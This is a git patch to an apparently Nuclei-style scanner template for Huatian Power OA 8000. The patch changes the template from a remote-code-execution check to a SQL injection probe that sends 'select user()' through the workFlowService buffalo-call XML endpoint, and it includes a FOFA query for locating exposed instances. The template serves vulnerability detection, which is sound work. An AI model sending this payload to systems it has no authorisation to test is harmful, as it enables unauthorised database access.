From 3698f0492d2788025a265822bee207b8c5ba44e4 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 1 Sep 2023 21:00:09 +0530
Subject: [PATCH] Update huatian-oa8000-buffalo-rce.yaml

---
 .../other/huatian-oa8000-buffalo-rce.yaml     | 30 +++++++++++--------
 1 file changed, 17 insertions(+), 13 deletions(-)

diff --git a/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml b/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml
index 6fb1322c1f..5c18665984 100644
--- a/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml
+++ b/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml
@@ -1,30 +1,34 @@
-id: huatian-oa8000-buffalo-rce
+id: huatian-oa8000-sqli
 
 info:
-  name: Huatian OA8000 Buffalo - Remote Code Execution
+  name: Huatian Power OA 8000 workFlowService - SQL injection
   author: SleepingBag945
   severity: critical
-  description: Huatian OA8000 Buffalo found to be vulnerable to Remote Code Execution vulnerability
+  description: |
+    There is a SQL injection vulnerability in the workFlowService interface of Huatian Power OA 8000 version, through which an attacker can obtain sensitive database information
+  reference:
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E5%8D%8E%E5%A4%A9OA/%E5%8D%8E%E5%A4%A9%E5%8A%A8%E5%8A%9BOA%208000%E7%89%88%20workFlowService%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
   metadata:
-    max-request: 2
+    max-request: 1
     verified: true
     fofa-query: app="华天动力-OA8000"
-  tags: huatian,oa,buffalo,rce
+  tags: huatian,oa,sqli
 
 http:
   - raw:
       - |
-        GET /OAapp/bfapp/buffalo/ HTTP/1.1
+        POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
         Host: {{Hostname}}
-
-      - |
-        POST /OAapp/bfapp/buffalo/ HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
+ 
+        <buffalo-call> 
+        <method>getDataListForTree</method> 
+        <string>select user()</string> 
+        </buffalo-call>
 
     matchers:
       - type: dsl
         dsl:
-          - status_code_1 == 500 && contains(body_1,'Buffalo worker support POST only!') && contains(body_1,'net.buffalo.service.BuffaloWorker.validate')
-          - status_code_2 == 500 && contains(body_2,'net.buffalo.service.NoSuchServiceException') && contains(body_2,'net.buffalo.service.BuffaloWorker.processRequest')
+          - 'status_code == 200'
+          - 'contains(content_type, "text/xml")'
+          - 'contains_all(body,"<buffalo-reply>" ,"<string>user()")'
         condition: and